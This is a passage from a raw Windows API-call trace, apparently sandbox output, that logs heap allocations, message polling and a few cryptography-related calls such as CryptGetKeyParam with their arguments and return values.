(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0040.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0040.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe4ad) returned 0x935008 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0040.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.657] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da358 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.657] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.658] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.659] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0040.660] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.660] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0040.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.664] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.664] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 